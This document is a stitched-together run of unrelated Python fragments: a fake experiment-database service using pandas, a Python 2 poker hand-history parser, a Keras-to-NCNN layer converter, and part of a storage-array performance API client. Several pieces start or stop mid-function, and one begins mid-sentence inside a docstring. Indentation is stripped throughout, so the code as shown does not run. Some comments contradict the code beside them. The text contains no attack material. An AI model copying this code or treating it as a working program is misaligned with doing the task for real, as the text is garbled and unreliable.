"The fake service currently supports only sorting by start_datetime, which can be "
"either asc or desc"
)
df = df.sort_values(
["start_datetime", "experiment_id"], ascending=[(sortby_split[1] == "asc"), True]
)
df = df.iloc[:limit]
return df.to_dict("records")
def delete_experiment(self, experiment_id: str) -> None:
if experiment_id not in self.exps.experiment_id.values:
return
index = self.exps[self.exps.experiment_id == experiment_id].index
self.exps.drop(index, inplace=True)
def create_analysis_result(
self,
experiment_id: str,
result_data: Dict,
result_type: str,
device_components: Optional[Union[str, DeviceComponent]] = None,
tags: Optional[List[str]] = None,
quality: Optional[str] = None,
verified: bool = False,
result_id: Optional[str] = None,
json_encoder: Type[json.JSONEncoder] = json.JSONEncoder,
**kwargs: Any,
) -> str:
if result_id is None:
            result_id = str(uuid.uuid4())
if result_id in self.results.result_id.values:
raise DbExperimentEntryExists("Cannot add analysis result with existing id")
# Clarifications about some of the columns:
# backend_name - taken from the experiment.
        # creation_datetime - not a parameter of
# `DatabaseService.create_analysis_result` but a parameter of
# `IBMExperimentService.create_analysis_result`. Since `DbExperimentData` does not set it
# via kwargs (as it does with chisq), the user cannot control the time and the service
# alone decides about it. Here we've chosen to set the start date of the experiment.
self.results = pd.concat(
[
self.results,
pd.DataFrame(
[
{
"result_data": result_data,
"result_id": result_id,
"result_type": result_type,
"device_components": device_components,
"experiment_id": experiment_id,
"quality": quality,
"verified": verified,
"tags": tags,
"backend_name": self.exps.loc[self.exps.experiment_id == experiment_id]
.iloc[0]
.backend_name,
"chisq": kwargs.get("chisq", None),
"creation_datetime": self.exps.loc[
self.exps.experiment_id == experiment_id
]
.iloc[0]
.start_datetime,
}
]
),
],
ignore_index=True,
)
# a helper method for updating the experiment's device components, see usage below
def add_new_components(expcomps):
for dc in device_components:
if dc not in expcomps:
expcomps.append(dc)
# update the experiment's device components
self.exps.loc[self.exps.experiment_id == experiment_id, "device_components"].apply(
add_new_components
)
return result_id
def update_analysis_result(
self,
result_id: str,
result_data: Optional[Dict] = None,
tags: Optional[List[str]] = None,
quality: Optional[str] = None,
verified: bool = None,
**kwargs: Any,
) -> None:
        if result_id not in self.results.result_id.values:
            raise DbExperimentEntryNotFound("Attempt to update a non-existing analysis result")
<filename>legacy/Hand_load.py
import re
import copy
import Classes as cl
import itertools
import Database_gen as dg
import pickle
import gc
"""
with open("/Users/Shuza/SpiderOak Hive/Poker hands/BovadaHandHistory/BovadaHandHistory_Omaha_PL_2016070722214792111.txt",'r') as f:
All stacks and betsizes tracked in BBs (for cross stakes)
hand converted and ordered. Replace Suits by ABCD (Hero,board,vil)
Keep track of pot size.
Bets and raises in terms of pot size.
calls in terms of pot size.
Track Allins and returned bets
later it will say Hero: posts *blind* *amount* if hero is in blinds.
Can figure out all positions from positions previously
grab digits+commas and periods = ^[0-9]{1,2}([,.][0-9]{1,2})?$
re.search(r"o\s\$([\d]+[,.][\d]+)?",action)
"""
#TODO create pre/flop/turn separate action groups for infoset
#only use effective stack size. Let it iterate over hands in a folder.
#store hands in rust format for easy eval?
#TODO Fixed overbets in terms of stacksize for HU. To fix for multiplayer
#need to isolate the players and compare the eff_stacksizes. Shouldn't be that hard
#TODO remove Hero and replace with generic position. Add a perspective field?
def get_digits(text):
return filter(str.isdigit, text)
def import_file(file_name,file_type):
with open(file_name,'r') as file:
file_contents = file.readlines()
length = len(file_contents)
infoset_list = []
i = 0
end = False
rake_format = False
#while end == False:
#for per hand basis
for x in xrange(0,5):
print "beginning", i
players = []
infoset = cl.Information_set()
positions = []
pot = 0
skip = False
print file_contents[0]
print 'length', length
#get header
(header,bb,i) = grab_header(file_contents,i,infoset)
#positions + stacks
(positions,i,players,skip) = grab_positions_stacks(file_contents,i,bb,positions,players,infoset,skip)
eff_stack = min(infoset.positions_stacks, key = lambda x: x[1])[1]
if skip == False:
#blinds and pot
                (pot,i,players,last_bet,position_replace) = grab_pot_blinds(file_contents,i,bb,pot,players)
#get holecards
(i,players,suit_replace) = grab_hand(file_contents,i,infoset,players)
#get actions/board cards
(i,pot,players,suit_replace,position_replace) = grab_actions(file_contents,i,infoset,bb,pot,players,suit_replace,last_bet,eff_stack,position_replace)
#get outcome
(i,pot,end,players) = grab_outcome(file_contents,i,infoset,pot,bb,end,length,players,rake_format,suit_replace)
#move to beginning of next hand
infoset_list.append(infoset)
else:
while not re.search("PokerStars",file_contents[i]):
i += 1
#forward to next hand
#gc.set_debug(gc.DEBUG_LEAK)
#return infoset_list
#makefile(infoset_list)
def grab_header(file_contents,i,infoset):
#First get stakes and game type
start = file_contents[i].index('$')
end = file_contents[i].index(')')
sliver = file_contents[i][start:end]
game_stakes = copy.copy(sliver)
#get bb
bb_slice = re.search(r"\/\$(\d+)",game_stakes)
bb = int(copy.copy(bb_slice.group(1)))
#print game_stakes, bb
start = file_contents[i].index(':')+2
end = file_contents[i].index('(')
sliver = file_contents[i][start:end]
game_type = copy.copy(sliver)
#print game_type
i += 1
#get ring type
start = file_contents[i].index('-') - 1
end = file_contents[i].index('S')
sliver = file_contents[i][start:end]
ring_type = copy.copy(sliver)
#print ring_type
header = game_stakes + ' ' + game_type + ring_type
print 'header',header
infoset.header = header
i += 1
return (header, bb, i)
def grab_positions_stacks(file_contents,i,bb,positions,players,infoset,skip):
while re.search(r"Seat (\d)",file_contents[i]):
#print "line",file_contents[i]
values = re.search(r"Seat (\d): (.*)\s\(\$([\d,\.,\,]+)",file_contents[i])
#print values.group(2)
position = values.group(2)
#get rid of commas in large numbers
stacksize_slice = copy.copy(values.group(3))
stacksize_slice = stacksize_slice.replace(',','')
stacksize_bb = (float(stacksize_slice)) / bb
players.append(cl.Player_load(stacksize_bb,position))
positions.append([position] + [stacksize_bb])
i += 1
print 'positions',positions
infoset.positions_stacks = positions
if len(positions) > 2:
#i += 1
skip = True
return (positions,i,players,skip)
#TODO: make this whole system more resilient to more players etc.
#TODO find hero and opponent and replace with generic positions
#create dictionary with names and actual positions
def grab_pot_blinds(file_contents,i,bb,pot,players):
#print '1', file_contents[i]
#HU only
people = []
while not re.search(r"blind",file_contents[i]):
i += 1
last_bet = 0
blinds = 0
blinds = re.search(r"\$(\d+)",file_contents[i])
blind = float(int(blinds.group(1)))/bb
#print 'SB', blind
player_small = re.search(r"(.*):",file_contents[i])
people.append(player_small.group(1))
#print player_small.group(1)
#add blinds to bet total for that player
for d in xrange(0,len(players)):
if players[d].position == player_small.group(1):
players[d].street_bet_total = blind
players[d].bet_total = blind
#This is for multi-player
#for d in xrange(0,len(players)):
# if players[d].position == "Small Blind":
# players[d].street_bet_total = blind
# players[d].bet_total = blind
# print "triggered"
#print "SB",blind
pot += blind
i +=1
while not re.search(r"blind",file_contents[i]):
i += 1
blinds = re.search(r"\$(\d+)",file_contents[i])
blind = float(int(blinds.group(1)))/bb
#print 'BB',blind
player_big = re.search(r"(.*):",file_contents[i])
people.append(player_big.group(1))
#print player_big.group(1)
for d in xrange(0,len(players)):
print players[d].position == player_big.group(1)
if players[d].position == player_big.group(1):
players[d].street_bet_total = blind
players[d].bet_total = blind
last_bet = blind
#this is for multiplayer
#for d in xrange(0,len(players)):
# if players[d].position == "Big Blind":
# players[d].street_bet_total = blind
# players[d].bet_total = blind
# last_bet = blind
# print "last",last_bet
pot += blind
while not re.search(r"^\*",file_contents[i]):
i += 1
#print 'i', i
#print "pot",pot
#print file_contents[i], i
true_position = ['small blind','big blind']
position_replace = dict(zip(people,true_position))
print position_replace
i += 1
return (pot,i,players,last_bet,position_replace)
def grab_hand(file_contents,i,infoset,players):
#add hero's hand. Order hero hand and convert into ints
holes = re.search(r"\[(.+)\]",file_contents[i])
#if no hero, skip hand.
    if not holes:
        raise ValueError('No hero hole cards found in hand history')
hero_holes = holes.group(1)
newcards = hand_conversion(hero_holes)
simplified_hand = dg.simplify(newcards)
simplified_hand.sort(reverse = True)
#print '1',simplified_hand,newcards
suits = map(lambda x:x[1],newcards)
generic_suits = map(lambda x:x[1],simplified_hand)
#print '2',suits,generic_suits
newsuits = unique(suits)
newgeneric_suits = unique(generic_suits)
#print '3',newsuits,newgeneric_suits
suit_replace = dict(zip(newsuits,newgeneric_suits))
hero_cards = hand_reconversion(newcards)
generic_hand = hand_reconversion(simplified_hand)
infoset.hand_sorted = hero_cards
infoset.hand_generic = generic_hand
print 'gen hand',infoset.hand_generic
#print 'suit_replace',suit_replace
return (i,players,suit_replace)
def hand_conversion(cards):
cards = ''.join(cards.split())
#print 'cards',cards
hero = list(cards)
#print 'hero',hero
newcards = [hero[y:y+2] for y in range(0,len(hero),2)]
for x in xrange(0,len(newcards)):
newcards[x][0] = cl.handvalues.get(newcards[x][0])
newcards.sort(reverse = True)
#print "newhero",newcards
return newcards
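#Illustrative trace of hand_conversion above (assumes cl.handvalues maps rank
#characters to ints, e.g. 'A' -> 14 and 'K' -> 13; the actual mapping lives in
#Classes.py and is not shown in this file):
#   hand_conversion('Ah Kd') -> [[14, 'h'], [13, 'd']]
#i.e. cards are split into [rank, suit] pairs, ranks converted to ints, and the
#pairs sorted high-to-low.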
def hand_reconversion(cards):
#turn 2d list into 1d string
single = list(itertools.chain.from_iterable(cards))
#turn 1d list into concatenated str
hero_cards = ''.join(str(e) for e in single)
return hero_cards
def unique(seq, idfun=None):
# order preserving
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen: continue
seen[marker] = 1
result.append(item)
return result
def grab_actions(file_contents,i,infoset,bb,pot,players,suit_replace,last_bet,eff_stack,position_replace):
print "grab_actions"
first_street = True
street = 0
infoset.board = []
infoset.generic_board = []
infoset.actions_full = []
#Get all actions and board cards until end of hand
while not re.search(r"(SHOW DOWN)",file_contents[i]) and not re.search("Uncalled",file_contents[i])\
and not re.search(r"(collected)",file_contents[i]):
#resets bettotal for subsequent streets
if first_street == False:
for p in xrange(0,len(players)):
players[p].street_bet_total = 0
line = copy.copy(file_contents[i])
print "start" ,i,file_contents[i]
place = re.search(r"\* ([A-Z]+) \*",file_contents[i])
if place:
print "Street",place.group(1)
grab_cards = re.findall(r"(\[[a-zA-Z,\s,\d]+\])",file_contents[i])
segment = grab_cards[-1]
board = segment.replace("]","")
#print "board",board
newboard = board.replace("[","")
#print "board",newboard
#have to order and break up the flop, update suit_replace
board = hand_conversion(newboard)
print "newboard", board
(generic_board,suit_replace) = dg.board_simplify(board,suit_replace)
infoset.board.append(grab_cards[-1])
infoset.generic_board.append(generic_board)
infoset.actions_full.append(generic_board)
print generic_board, board
i+=1
#grab actions and positions
while not re.search(r"^\*",file_contents[i]) and not re.search("Uncalled",file_contents[i]):
#while re.search("|".join(["raises"]))
#print "pos1",file_contents[i]
#print 'pot', pot
#check for "Table deposit $xxx" and "Seat re-join" and skip
while re.search(r"Table",file_contents[i]) or re.search(r"Seat re-join",file_contents[i])\
or re.search(r"Seat sit down",file_contents[i]) or re.search(r"doesn't show hand",file_contents[i]):
print "skip"
print i,file_contents[i]
i += 1
if re.search(r"^\*",file_contents[i]) or re.search("Uncalled",file_contents[i])\
or re.search(r"(collected)",file_contents[i]):
break
#print 'uncalled boolean',not re.search("Uncalled",file_contents[i])
print file_contents[i]
values = re.search(r"(.+): (.+)",file_contents[i])
#print "values",values.group(1),"\n",values.group(2)
position = copy.copy(values.group(1))
temp = copy.copy(values.group(2))
action = temp[:-1]
pure_action = re.search(r"([a-z]+)",action)
print pure_action.group(0)
#print "if than bets", pure_action.group(0) == "bets"
#print "if than calls", pure_action.group(0) == "calls"
firstword = re.search(r"\s\$([\d]+|[,.][\d]+)?",action)
#print "firstattempt", firstattempt.group(1)
#nextword = firstattempt = firstattempt.replace(',','')
#firstword = float(firstattempt)
if firstword:
#print 'firstword', firstword.group(1)
for p in xrange(0,len(players)):
if players[p].position == position:
current_player = players[p]
allin = re.search(r"s\s(all-in)",action)
if allin:
#print 'allin',allin.group(1)
current_player.allin = True
print 'current_player.bet_total', current_player.bet_total
if pure_action.group(0) == "bets":
#print "ding bets"
true_amnt_slice = re.search(r"s\s\$(\d+[,]?\d+[\.]?[\d+]?)",action)
combined = re.sub(r",","",true_amnt_slice.group(1))
amnt = float(combined)/bb
#HU only, removes the possibility of betting more than eff stack
if (amnt + current_player.bet_total) > eff_stack:
"effective_bet"
amnt = (eff_stack - current_player.bet_total)
current_player.bet_total += amnt
current_player.street_bet_total += amnt
last_bet = copy.copy(current_player.street_bet_total)
#print 'pot,addition',pot,amnt
ratio = float(amnt)/pot
pot += amnt
elif pure_action.group(0) == "calls":
#print "ding call"
true_amnt_slice = re.search(r"s\s\$(\d+[,]?[\d+]?[\.]?[\d+]?)",action)
end_value = re.sub(r",","",true_amnt_slice.group(1))
#print "true",end_value
amnt = float(end_value)/bb
current_player.bet_total += amnt
current_player.street_bet_total += amnt
#TODO: in ring games, need to account for limps pre
#last_bet = copy.copy(current_player.street_bet_total)
#print "pot,addition",pot,amnt
pot += amnt
ratio = float(amnt)/pot
if current_player.allin == True:
#HU only
#print "allin trigger"
#print players[0].bet_total
for q in xrange(0,len(players)):
if players[q].position != current_player.position:
villain_player = players[q]
print villain_player
if current_player.bet_total != villain_player.bet_total:
extra = villain_player.bet_total - current_player.bet_total
#print 'extra', extra
#print villain_player.bet_total, current_player.bet_total
pot -= extra
villain_player.bet_total -= extra
elif pure_action.group(0) == "raises":
#print "ding raise"
#fix to scrap the cents after period
true_amnt_slice = re.search(r"o\s\$(\d+[,]?\d+[\.]?[\d+]?)",action)
end_value = re.sub(r",","",true_amnt_slice.group(1))
#print "true",end_value
amnt = float(end_value)/bb
#if true_amnt_slice.group(2):
# print "true2"
total_raise = float(end_value)/bb
#minus what i have invested
true_amnt = total_raise - current_player.street_bet_total
#check if allin
#print 'sub',(last_bet - current_player.street_bet_total)
#print "last", last_bet
#print 'pot', pot
maxraise = (last_bet) + (last_bet - current_player.street_bet_total) + pot
#print 'ratio 2nd',maxraise,amnt
#HU only - raise up to eff_stacksize
if (true_amnt + current_player.bet_total) > eff_stack:
                        true_amnt = (eff_stack - current_player.bet_total)
<filename>converter/converter.py
# https://github.com/Tencent/ncnn/wiki/how-to-implement-custom-layer-step-by-step
# https://github.com/Tencent/ncnn/wiki/param-and-model-file-structure
# https://github.com/Tencent/ncnn/wiki/operation-param-weight-table
import numpy as np
from tqdm import tqdm
from functools import partial
from collections import OrderedDict
from converter.model_adaptation import get_outbound_nodes, convert_blob, clean_node_name
activation_type_dict = {'linear': 0, 'relu': 1, 'sigmoid': 4, 'tanh': 5}
layer_type_mapping = {'OutputSplit': 'Split', 'InputLayer': 'Input', 'ReLU': 'ReLU', 'LeakyReLU': 'ReLU',
'MaxPooling2D': 'Pooling', 'AveragePooling2D': 'Pooling',
'MaxPool2D': 'Pooling', 'AvgPool2D': 'Pooling',
'GlobalMaxPooling2D': 'Pooling', 'GlobalAveragePooling2D': 'Pooling',
'GlobalMaxPool2D': 'Pooling', 'GlobalAvgPool2D': 'Pooling',
'Conv2D': 'Convolution', 'Concatenate': 'Concat',
'UpSampling2D': 'Interp', 'Add': 'Eltwise', 'Multiply': 'Eltwise',
'DepthwiseConv2D': 'ConvolutionDepthWise', 'BatchNormalization': 'BatchNorm',
'Conv2DTranspose': 'Deconvolution', 'ZeroPadding2D': 'Padding', 'ReflectPadding2D': 'Padding',
'Reshape': 'Reshape',
'Clip': 'Clip', 'InstanceNormalization': 'InstanceNorm',
'Softmax': 'Softmax', 'Swish': 'Swish',
'sigmoid': 'Sigmoid', 'softmax': 'Softmax', 'relu': 'ReLU', 'tanh': 'TanH', 'Flatten': 'Reshape',
'Dense': 'InnerProduct',
'Sqrt': 'UnaryOp',
'Subtract': 'BinaryOp', 'Div': 'BinaryOp', 'Interp': 'Interp',
'MultiplyBroadCasted': 'BinaryOp'}
def fix_axis_value(in_dict, axis):
if axis < 0:
axis = len(in_dict['layer'].output_shape) + axis
if len(in_dict['layer'].output_shape) == 4:
magic_number = 2
elif len(in_dict['layer'].output_shape) == 3:
magic_number = 1
else:
        raise NotImplementedError
    # NCNN tensors are 3-dim (CHW), so the Keras axis must be remapped.
    # A channel-first (NCHW-style) target layout is assumed; NHWC is not supported.
    axis = magic_number - int(axis - 1)
assert axis >= 0, 'Axis can not be negative'
return axis
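# Worked example of the remapping above (illustrative): for a Keras layer with a
# 4-D NHWC output and axis=-1 (channels), axis first becomes 4 + (-1) = 3,
# magic_number is 2, and the result is 2 - (3 - 1) = 0, i.e. the channel axis
# of NCNN's CHW tensor.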
def get_valid_shape(raw_shape):
if isinstance(raw_shape, list):
layer_shape_list = raw_shape
else:
layer_shape_list = [raw_shape]
return layer_shape_list
def get_layer_type(layer):
type_mapping = type(layer).__name__
if type_mapping == 'Activation':
type_mapping = layer.get_config()['activation']
elif type_mapping == 'BatchNormalization':
try:
call_args = layer.inbound_nodes[0].call_kwargs
if 'training' in call_args:
if call_args['training'] in [1, True]:
type_mapping = 'InstanceNormalization'
except Exception as e_item:
print('Implicit Instance Normalization')
print(str(e_item))
elif type_mapping == 'Multiply':
_first = layer.input_shape[0]
check = all([len(i) == len(_first) for i in layer.input_shape[1:]])
if check:
check = all([all([j == k for j, k in zip(i, _first)]) for i in layer.input_shape[1:]])
if not check:
type_mapping = 'MultiplyBroadCasted'
assert len(layer.input_shape) == 2, "Only BinaryOp supported"
mapping_function_name = '_'.join(['get', str(type_mapping).lower(), 'mapping'])
return layer_type_mapping[type_mapping], mapping_function_name
def get_layer_name(layer):
return layer.get_config()['name']
def get_blob_shape_string(layer, batch_size):
N = batch_size
item_counter = 0
item_list = []
layer_output_shape = get_valid_shape(layer.output_shape)
for output_shape in layer_output_shape:
item_counter += 4
item_list.extend((N,) + output_shape[1:])
blob_shape_string = ','.join([str(item) for item in [item_counter] + item_list])
return blob_shape_string
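# Worked example (illustrative): for a single output of shape (None, 224, 224, 3)
# and batch_size=1, the function emits "4,1,224,224,3": a leading item count (4)
# followed by the N,H,W,C values of each output blob.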
def get_split_shape_string(layer_output_shape, batch_size):
N = batch_size
item_counter = 0
item_list = []
for output_shape in layer_output_shape:
_, H, W, C = output_shape
item_counter += 4
item_list.extend([N, H, W, C])
blob_shape_string = ','.join([str(item) for item in [item_counter] + item_list])
return blob_shape_string
def split_remap(blob_name, split_info):
if blob_name in split_info:
out_blob_name = split_info[blob_name]
else:
out_blob_name = blob_name
return out_blob_name
def get_in_out_string(in_dict):
layer = in_dict['layer']
input_blobs = []
output_blobs = []
layer_input = convert_blob(layer.input)
if layer.__class__.__name__ == 'InputLayer':
layer_input = []
layer_output = convert_blob(layer.output)
for item in layer_input:
input_blobs.append(clean_node_name(item.name))
for item in layer_output:
output_blobs.append(clean_node_name(item.name))
in_out_list = [str(len(input_blobs)), str(len(output_blobs)), ' '.join(input_blobs), ' '.join(output_blobs)]
in_out_string = ' '.join(in_out_list)
split_string = None
return in_out_string, split_string, (input_blobs + output_blobs)
def get_outputsplit_mapping(in_dict):
parameter_mapping = OrderedDict({})
return parameter_mapping
def get_reshape_mapping(in_dict):
# Reshape 0 w -233
# 1 h -233
# 2 c -233
# 3 permute 0
layer_config = in_dict['layer'].get_config()
target_shape = layer_config['target_shape']
if len(target_shape) == 3:
y_size, x_size, c_size = target_shape
parameter_mapping = OrderedDict({0: x_size, 1: y_size, 2: c_size, 3: 0})
elif len(target_shape) == 2:
xy_size, c_size = target_shape
parameter_mapping = OrderedDict({0: xy_size, 1: c_size, 2: -233, 3: 1})
elif len(target_shape) == 1:
c_size, = target_shape
parameter_mapping = OrderedDict({0: c_size, 1: -233, 2: -233, 3: 1})
else:
        raise NotImplementedError
return parameter_mapping
def get_flatten_mapping(in_dict):
# Reshape 0 w -233
# 1 h -233
# 2 c -233
# 3 permute 0
parameter_mapping = OrderedDict({0: -1, 3: 1})
return parameter_mapping
def get_unaryop_mapping(in_dict, optype):
# enum OperationType
# {
# Operation_ABS = 0,
# Operation_NEG = 1,
# Operation_FLOOR = 2,
# Operation_CEIL = 3,
# Operation_SQUARE = 4,
# Operation_SQRT = 5,
# Operation_RSQRT = 6,
# Operation_EXP = 7,
# Operation_LOG = 8,
# Operation_SIN = 9,
# Operation_COS = 10,
# Operation_TAN = 11,
# Operation_ASIN = 12,
# Operation_ACOS = 13,
# Operation_ATAN = 14,
# Operation_RECIPROCAL = 15,
# Operation_TANH = 16
# };
parameter_mapping = OrderedDict({0: optype})
return parameter_mapping
get_sqrt_mapping = partial(get_unaryop_mapping, optype=5)
def get_binaryop_mapping(in_dict, optype):
# enum OperationType
# {
# Operation_ADD = 0,
# Operation_SUB = 1,
# Operation_MUL = 2,
# Operation_DIV = 3,
# Operation_MAX = 4,
# Operation_MIN = 5,
# Operation_POW = 6,
# Operation_RSUB = 7,
# Operation_RDIV = 8
# };
parameter_mapping = OrderedDict({0: optype})
return parameter_mapping
get_subtract_mapping = partial(get_binaryop_mapping, optype=1)
get_multiplybroadcasted_mapping = partial(get_binaryop_mapping, optype=2)
get_div_mapping = partial(get_binaryop_mapping, optype=3)
def get_inputlayer_mapping(in_dict):
# Input 0 w 0
# 1 h 0
# 2 c 0
layer_config = in_dict['layer'].get_config()
N, H, W, C = layer_config['batch_input_shape']
parameter_mapping = OrderedDict()
if W is not None:
parameter_mapping[0] = W
if H is not None:
parameter_mapping[1] = H
if C is not None:
parameter_mapping[2] = C
return parameter_mapping
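# Worked example (illustrative): an InputLayer with batch_input_shape
# (None, 224, 224, 3) yields OrderedDict({0: 224, 1: 224, 2: 3}),
# i.e. NCNN's w, h, and c parameters in that order.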
def get_padding_mapping(in_dict, pad_type=0):
# Padding
# 0 top 0
# 1 bottom 0
# 2 left 0
# 3 right 0
# 4 type 0
# 5 value 0.f
# 6 per_channel_pad_data_size 0
# 7 front 0
# 8 behind 0
# int type; -> pad_type // 0=CONSTANT 1=REPLICATE 2=REFLECT
layer_config = in_dict['layer'].get_config()
per_channel_pad_data_size = 0
front = behind = 0
pad_value = float("{0:.7f}".format(0.))
top_pad, bottom_pad, left_pad, right_pad = np.array(layer_config['padding']).flatten()
parameter_mapping = OrderedDict({0: top_pad, 1: bottom_pad, 2: left_pad, 3: right_pad,
4: pad_type, 5: pad_value, 6: per_channel_pad_data_size,
7: front, 8: behind})
return parameter_mapping
get_zeropadding2d_mapping = partial(get_padding_mapping, pad_type=0)
get_reflectpadding2d_mapping = partial(get_padding_mapping, pad_type=2)
def get_pooling2d_mapping(in_dict, pooling_type, global_pooling=0):
# Pooling :: from C++ enum PoolMethod { PoolMethod_MAX = 0, PoolMethod_AVE = 1 };
# 0 pooling_type 0
# 1 kernel_w 0
# 11 kernel_h kernel_w
# 2 stride_w 1
# 12 stride_h stride_w
# 3 pad_left 0
# 14 pad_right pad_left
# 13 pad_top pad_left
# 15 pad_bottom pad_top
# 4 global_pooling 0
# 5 pad_mode 0
layer_config = in_dict['layer'].get_config()
if global_pooling == 0:
kernel_h, kernel_w = layer_config['pool_size']
stride_h, stride_w = layer_config['strides']
layer = in_dict['layer']
layer_input_shape = get_valid_shape(layer.input_shape)
layer_output_shape = get_valid_shape(layer.output_shape)
input_y_size, input_x_size = layer_input_shape[0][1:3]
output_y_size, output_x_size = layer_output_shape[0][1:3]
if kernel_h == stride_h:
pad_bottom = pad_top = 0
else:
pad_top, pad_bottom = get_pooling_padding(input_y_size, output_y_size, kernel_h, stride_h, None)
if kernel_w == stride_w:
pad_left = pad_right = 0
else:
pad_left, pad_right = get_pooling_padding(input_x_size, output_x_size, kernel_w, stride_w, None)
pad_mode = 0
parameter_mapping = OrderedDict({0: pooling_type, 1: kernel_w, 2: stride_w, 3: pad_left,
4: global_pooling, 5: pad_mode,
11: kernel_h, 12: stride_h, 13: pad_top, 14: pad_right, 15: pad_bottom})
else:
parameter_mapping = OrderedDict({0: pooling_type, 4: global_pooling})
return parameter_mapping
get_maxpooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=0, global_pooling=0)
get_averagepooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=1, global_pooling=0)
get_globalmaxpooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=0, global_pooling=1)
get_globalaveragepooling2d_mapping = partial(get_pooling2d_mapping, pooling_type=1, global_pooling=1)
def get_multiply_mapping(in_dict):
return get_merge_mapping(in_dict, op_type=0)
def get_add_mapping(in_dict):
return get_merge_mapping(in_dict, op_type=1)
def get_merge_mapping(in_dict, op_type):
# Add, Multiply, Max -> C++ class Eltwise : public Layer
# enum OperationType { Operation_PROD = 0, Operation_SUM = 1, Operation_MAX = 2 };
# Eltwise
# 0 op_type 0
# 1 coeffs []
# TODO :: support other ops
parameter_mapping = OrderedDict({0: op_type})
return parameter_mapping
def get_upsampling2d_mapping(in_dict):
# Interp
# 0 resize_type 0 #FIXED TO 1 (nearest), 2 (bilinear)
# 1 height_scale 1.f
# 2 width_scale 1.f
# 3 output_height 0
# 4 output_width 0
layer_config = in_dict['layer'].get_config()
resize_type = 1
# print(layer_config)
if 'interpolation' in layer_config:
if layer_config['interpolation'] == 'bilinear':
resize_type = 2
height_scale, width_scale = layer_config['size']
parameter_mapping = OrderedDict({0: resize_type, 1: float("{0:.7f}".format(height_scale)),
2: float("{0:.7f}".format(width_scale)),
# TODO :: Clarify lines below
# 3: <>, 4: <>
})
return parameter_mapping
def get_interp_mapping(in_dict, use_scale=False):
# Interp
# 0 resize_type 0 #FIXED TO 1 (nearest), 2 (bilinear)
# 1 height_scale 1.f
# 2 width_scale 1.f
# 3 output_height 0
# 4 output_width 0
layer = in_dict['layer']
layer_config = layer.get_config()
# TODO Bilinear interpolation is not working properly!
# resize_type = 2 #'bilinear'
resize_type = 1
if use_scale:
# This one is not preferable due to the rounding errors
layer_input_shape = get_valid_shape(layer.input_shape)
# layer_output_shape = get_valid_shape(layer.output_shape)
input_y_size, input_x_size = layer_input_shape[0][1:3]
# output_y_size, output_x_size = layer_output_shape[0][1:3]
new_height, new_width = list(layer_config['new_size'])
height_scale = new_height/input_y_size
width_scale = new_width/input_x_size
parameter_mapping = OrderedDict({0: resize_type, 1: float("{0:.7f}".format(height_scale)),
2: float("{0:.7f}".format(width_scale)),
# TODO :: Looks like not working properly
# 3: <>, 4: <>
})
else:
new_height, new_width = list(layer_config['new_size'])
parameter_mapping = OrderedDict({0: resize_type, 3: str(int(new_height)),
4: str(int(new_width)),
})
return parameter_mapping
def get_conv_padding(input_size, output_size, kernel_size, stride_size, dilation_rate):
effective_kernel = kernel_size + 2*(dilation_rate - 1)
# t_pad = effective_kernel + stride_size * (output_size - 1) - input_size
t_pad = stride_size * output_size - input_size + effective_kernel - stride_size
t_pad = max(t_pad, 0)
f_pad = s_pad = 0
if t_pad > 0:
f_pad = t_pad // 2
s_pad = t_pad - f_pad
return f_pad, s_pad
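# Worked example of the arithmetic above (values are illustrative): for
# input_size=7, output_size=4, kernel_size=3, stride_size=2, dilation_rate=1,
# the effective kernel is 3 and t_pad = 2*4 - 7 + 3 - 2 = 2, so the function
# returns (1, 1), matching Keras 'same' padding for that geometry.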
def get_pooling_padding(input_size, output_size, kernel_size, stride_size, dilation_rate):
t_pad = stride_size * output_size - input_size + kernel_size - stride_size
t_pad = max(t_pad, 0)
f_pad = s_pad = 0
    if t_pad > 0:
        f_pad = t_pad // 2
        s_pad = t_pad - f_pad
    return f_pad, s_pad
on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
type (str, optional):
                Display the metric of a specified object type. Valid values are `all`,
                `file-system`, and `object-store`. If not specified, defaults to `all`.
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
type=type,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_performance_replication_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_s3_specific_performance(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
async_req=False, # type: bool
_return_http_data_only=False, # type: bool
_preload_content=True, # type: bool
_request_timeout=None, # type: Optional[int]
):
# type: (...) -> models.ArrayS3SpecificPerformanceGetResp
"""
List the S3 performance metrics of the array.
Args:
end_time (int, optional):
When the time window ends (in milliseconds since epoch).
resolution (int, optional):
The desired ms between samples. Available resolutions may depend on data type,
`start_time` and `end_time`. In general `1000`, `30000`, `300000`, `1800000`,
`7200000`, and `86400000` are possible values.
start_time (int, optional):
When the time window starts (in milliseconds since epoch).
async_req (bool, optional):
Request runs in separate thread and method returns
multiprocessing.pool.ApplyResult.
_return_http_data_only (bool, optional):
Returns only data field.
_preload_content (bool, optional):
Response is converted into objects.
_request_timeout (int, optional):
Total request timeout in seconds.
Returns:
ValidResponse: If the call was successful.
ErrorResponse: If the call was not successful.
Raises:
PureError: If calling the API fails.
ValueError: If a parameter is of an invalid type.
TypeError: If invalid or missing parameters are used.
"""
kwargs = dict(
end_time=end_time,
resolution=resolution,
start_time=start_time,
async_req=async_req,
_return_http_data_only=_return_http_data_only,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
)
kwargs = {k: v for k, v in kwargs.items() if v is not None}
endpoint = self._arrays_api.api20_arrays_s3_specific_performance_get_with_http_info
return self._call_api(endpoint, kwargs)
def get_arrays_space(
self,
end_time=None, # type: int
resolution=None, # type: int
start_time=None, # type: int
type=None, # type: str
